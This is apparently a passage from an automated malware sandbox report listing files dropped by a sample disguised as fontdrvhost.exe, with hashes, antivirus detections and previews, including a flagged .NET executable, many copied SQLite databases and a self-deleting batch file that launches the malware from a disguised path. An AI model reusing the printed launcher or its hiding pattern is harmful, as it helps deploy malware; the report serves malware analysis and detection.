....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Recovery\f8dafbcfe7f5f1

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with very long lines (630), with no line terminators
Category:	dropped
Size (bytes):	630
Entropy (8bit):	5.8879503955421715
Encrypted:	false
SSDEEP:	12:G4sxHMcX+CawOmdWNzDG4bIMfnw9P0Bvym6nOWxSFnWqcQ8FAF4biT0bAqbr3Km:Exs+AwmzDGs3nw9kqm6nOWxmWdQ8FFUA
MD5:	70DF5E0FEE0B7C60B3F12EB0FADC6D39
SHA1:	8B3E40D1E02D9D7FC5DE2F2EE1CE1790DA47154B
SHA-256:	E60A90D50E1515C49697B9DAD07903A8176D175108B925B729CD597D747DABAC
SHA-512:	82DB715CD323A2D18344118074F5DE0E41CA34476A75523003E337F71BB39BA7C78FD39A38BEB8B016F482BDD304AF99C0E5C22E6B9F7FABE180FE3E6B9D16B8
Malicious:	false
Preview:	lbZfn4GtUOxAA00oKhex4dK6II7MA87aw7D3McaKqgMhY9zZphAEolsHQcXe64tVRWNDx6bsHUHYRniITigc83vLO5muF5Ovx0PBvvmsFS6UdU0n4OLYXQXYlCy1UrnMFVlaXgWh5yWq6br4F8z0uzYgd1at7vXYouOHtZQY1nci4qcJV3vV1wbP7E7fGnkKa8BLMjLqsb9HXzmwZQYE9Cg2S8KocuSODRH5pQ6vrFnaxU2HcKGzPgLYbI3OZhN7JuEGrqHIUmW3YFF8GDLRoc9gGtdgXsWJ1pRCQwZwD7fmJRAVD5HWW5TqvhA8MkvlQMBsyCrUnZOq7XWysIdbkAx6WkRtwajcL3V7QRhANxs6rnsXKLPEHUBQYFWNu8iMzweEBZibkcNwR1Pt24ikKeV12FiK5TPPPgG4IoWvnydoGO8h0mV0Z8BVanM50XfRM8hvuUkOhx6VBrvoHBUT8Z0Revefca4PTMbIqNwgBHTlBpTt1iyyDMTxHQQ8zFwH2rCzPn74OyR0GPQzbvn4lGMH2nAa6yq6VLsTnedOk4kP4cr2AbgEb2fwe56mmh7aHVf4g6M7SYTrf6Ma6IZfRledq6yri0mC6JHj7xWEPjwCiyQisfqeHc

C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Users\Default\AppData\Local\f8dafbcfe7f5f1

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with very long lines (607), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.895697661864278
Encrypted:	false
SSDEEP:	12:bM3dwSCgk6N0hrjmAecry+FkbiRvz/Z7lmc3ApAriD+6yK:SRO1wsrHFkbiRb/CZDtb
MD5:	1A1984AE9E949B8FD4E7A4FCCE82B19C
SHA1:	52FE6E259133611B9A151A99E264BF9099946FE8
SHA-256:	EC17EF974D2B86E133BA8C7A3E5767EA68676E78E4C4A41419046BE1A1BA3110
SHA-512:	E53DA2843CFD6DBF479A0727DD2718C86A2947F774A1C7AC3FA1E481FA491B8B592C8D6E22E14285D2AE4182CF1EBF8403F5716AF11E816E2AA07C8373AC1401
Malicious:	false
Preview:	6RnMQVHDBHWd1Nepp94txyqcXUYafaIGNojBYJjSA1ykDVuIKDtdHpxHkKz57qil8QPNndRgZms59FZCkQQbqp8h0baNTnUUTNmxFherwMDe71HfvxVqaG4TRsWMCDNvRXmwdl7Cvjpeldj8T5bgSo4NSTfWKRos9SNkPVBJ0T51aarxIX3HlrdncYeKGk1d47eTQ9t83Rp9sDw1lrOxYgGSzjH001DPbb6d5YhIo5NTBd4ZlmiYWEFY0Mdq22HCOZhRHT6NKFIcSxQVorOOSp3WVimt40PwxLFl5nSSqVNQ6mFD5ICLn3tifL5iqMSUzWoHroZBZ6h7cnasdjyvyEI4bgGustleC2bj77VQtBvqWwG2vMFHYgguNuqKipSqUD5jL0vfNhCxScipaN8fneFfWqWNRLrEsFVS0gq4bk30etcvMAtVqxC07aMfehOC08ENGPy3gEEDlPBnOkBQbVX5DfVaULa3W1AfoOp6M0zms9OrYjR3g7kelJKk4XjVnKruPg895EElgvMDQnCu3gXYQf4eEFCzQe8iSec2kS8b398z7GTQVybHwSdtle4zCPUBxnvwLJJkh6fQhEh7vwdbC1v9BsQ

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe.log

Download File

Process:	C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2041
Entropy (8bit):	5.374034001672589
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
MD5:	6594A52AA7EC9BF342D53EF8C5C3F92F
SHA1:	E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
SHA-256:	1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
SHA-512:	29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Temp\3iMMnB0sfI

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BPOjh9hPL9

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bo8iQyRCqf

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:M6qIBL+I:bL
MD5:	1AD0C653FFA1B3EDE4F9237EC5569EA0
SHA1:	84D732F3162A7133864A766C2409154C11C230BA
SHA-256:	D054B2921EC4808B6F120E4A7DCACF8D81581A2DC306B3F2C58F28FACE4C2A24
SHA-512:	89D43F12DFC4818A32DE771873192C572AEFD44775A07EDA037D3C93085271190B1134B099902E8F4DDEAC317A094D2B397B32E00CF623E6075E352D4FD42F26
Malicious:	false
Preview:	bR67xzhBXbMiwvOmWd54VnDMm

C:\Users\user\AppData\Local\Temp\FiIzjq9Gz6

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.378783493486176
Encrypted:	false
SSDEEP:	3:Y2Qt6eYYn:Y2Qt6eYYn
MD5:	6CA4960355E4951C72AA5F6364E459D5
SHA1:	2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
SHA-256:	88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
SHA-512:	8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
Malicious:	false
Preview:	{"Surveys":{}}

C:\Users\user\AppData\Local\Temp\Fq0Q1QpaUP

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IDdJQIz9gk

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\J8M2vhPRwT

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JlSSzc94tq

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\K70gV75VT0

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OrkVKDmEnS

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c1NUocxGwJ

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dhpSrMBRff

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\doH1J2y0cr

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.346172368496825
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEo8GK9GtKOZG1wkn23fJM2G:CuVEOCDExGK9GdfRMl
MD5:	C975FBE87D330EF2B5FAE59C796BF438
SHA1:	FC80A882FEF60B01A70E741F79565904EE48C5F2
SHA-256:	BA161E369B895077D1684E16820121ED9925E630E6ECFE0727C7976B7BEED9FA
SHA-512:	BD0CC0526A192763E9797BA529CAF79BFC5C6DF110AA858B69A782C60351266696AEBF7DAFC8305425597C8E4DA2B1B752D259546BD70B57603CFFC262869D8D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lscqkorEZ8.bat"

C:\Users\user\AppData\Local\Temp\mAGwqIlWDe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\t6yFe3K859

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:ptysgK9:posgK9
MD5:	A88F5DED316D85D4FEF27B4F943E13DF
SHA1:	91695D12090CD4407895A1B3149850F8CC9D47B8
SHA-256:	8D62EBD58291719202E077EB70DECD120D05AB1612FAED040C41253CEF5BC699
SHA-512:	D997DC08AABEC2E170629278A4119BA7E08BFFBAED9B85E3C0A52062D786A18DC31B7671466251C523D0FD8B5AAAC48765CEE0D1F02B1158B7B315AB24472674
Malicious:	false
Preview:	VmBCR8wHipLoNRBISayY1pU2X

C:\Users\user\AppData\Local\Temp\tApNpX5ile

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xsYgQaH26f

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yNZvgTXn9e

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
